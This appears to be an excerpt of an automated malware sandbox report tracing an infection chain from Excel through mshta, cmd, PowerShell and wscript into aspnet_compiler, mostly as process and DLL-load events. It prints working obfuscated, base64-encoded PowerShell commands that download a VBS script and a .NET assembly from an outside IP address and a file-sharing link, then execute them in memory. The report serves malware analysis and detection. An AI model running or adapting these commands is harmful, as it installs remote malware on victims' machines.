FdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
